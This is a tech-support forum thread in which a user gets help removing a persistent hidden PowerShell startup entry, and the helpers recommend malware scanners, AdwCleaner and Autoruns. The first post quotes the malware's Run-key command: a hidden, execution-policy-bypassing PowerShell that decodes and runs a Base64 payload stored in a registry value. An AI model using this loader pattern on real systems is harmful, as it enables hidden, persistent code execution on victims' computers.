Solved Powershell programs keeps enabling itself after disabling it

[jhefreyzz]

Hello I'm so frustrated on how this thing would vanished on my computer system. It keeps checked even though I disabled or uncheck it in the msconfig
here's what I am referring to.

Microsoft Operating System Microsoft Corporation C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\FeiSholEpOohbCv').sSqBn))); HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

I try to delete the registry key but I can't delete it.
Going through the Run registry and found it but it keeps coming back.

What should I do.
I scanned my computer already with MBAM, Rogue Killer, Microsoft Windows Defender yet I get no possible virus infection.

Moreover I try to reg query it like this one
reg query "HKCU\Software\Classes\FeiSholEpOohbCv" /v "sSqBn"
and the result is in the attachment


Maybe someone can help me get rid of this virus or what this thing called

 

[Pyprohly]

We've seen something like this before: PowerShell starts with Windows, can't disable it from msconfig.exe. The OP claimed that he was able to remove the start item after deleting PowerShell altogether! Not a great solution.

Btw, the data in the text file you've provided isn't complete; I wasn't able to decode it very well.

Try redirecting the registry value's contents directly to a file,

reg query "HKCU\Software\Classes\FeiSholEpOohbCv" /v "sSqBn" > "C:\Users\%USERNAME%\Desktop\FeiSholEpOohbCv.txt"

 

[jhefreyzz]

Thank you for the response sir.
I already did what you've said and I've attach the result file.

Hoping you could address my problem.

 

[Pyprohly]

Hi,

I cannot help you combat viruses. I can only confirm to you that you're experiencing the exact same issue YUNoCake had in the thread I mentioned.

The data in that "sSqBn" registry value of yours, Jhefreyzz, decodes into the exact same script as YUNoCake's, but all the obfuscated variable names are different.

I'll see if I can get someone more experienced to help you remove that registry key and that startup entry.

 

[ThrashZone]

Hi,
Review Jacee’s instructions to run Adwcleaner here post #7,
Ignore the title of the thread,
http://www.sevenforums.com/system-security/316404-instant-savings-app.html
On the BleepingComputer site use the button that looks like this,

You can use these free tools to see if they find anything,
Manually Update them before running full scans,
Try not to use your computer while the scans are running, (one at a time of course).
See this tutorial on how to download and run Malwarebytes,
http://www.sevenforums.com/tutorials/338716-malwarebytes-anti-malware-free.html

Also use the Custom scan option not the Threat scan select the drives to scan,
Malwarebytes | Free Anti-Malware Detection & Removal Software
SAS is safe to remove anything it finds
SUPERAntiSpyware | Remove Malware | Remove Spyware - AntiMalware, AntiSpyware, AntiAdware!

I also would use TFC,
This must be downloaded to your desktop
Then right click the desktop icon and run it as administrator
TFC - Temp File Cleaner by OldTimer Download - Geeks to Go Forum

 

[jhefreyzz]

Thank you for the suggestions

[x]Malwarebytes custom scan detects nothing
[✓] logfile attached
[✓] software updated before full scan
[x]SAS sames result with Malwarebytes
[✓] no logfile was attached as it detects almost 1000 threats yet it was browser cookies, some virus false detection
[✓] TFC run and clean the system
[✓] I run autoruns and found out that the persistent startup item is hidden
Screenshot attached:


I wondered after I run autoruns and try to delete the persistent item is disappears from startup item but then again I try to trace if there's still the virus and without a surprise I found out that the registry key is still present while on the CurrentVersion\Run has empty entries
pictures show below

Try to delete the key it says "Cannot delete FeiSholEpOohbCv: Error while deleting the key

 

[Layback Bear]

Startup item keeps coming back after disabling it - Am I infected? What do I do?

 

[Jacee]

Please stay with your topic at Bleeping Computers and follow all instructions given there!
Startup item keeps coming back after disabling it - Am I infected? What do I do?

You will only confuse yourself opening the same topic on different forums.

 

[jhefreyzz]

hello thank you for the concern.

Somehow helpful response here help me get rid of the virus.

It was like after many scan from different scanners it was just become terminable. I used Autoruns and delete the startup entry. I was expect it to come back after it was deleted but happily it wasn't

I traced the registry entry for that virus and delete it.

I searched for possible reappearance of the virus on the registry entry but it wasn't there.

I used malwarebytes again for the last time for the remains of the virus if it was there and detect nothing.

I think my system is already clean.

Thank you for the response guys

 

[Layback Bear]

If you system is fixed; please inform the good folks at Bleeping Computer that are helping you.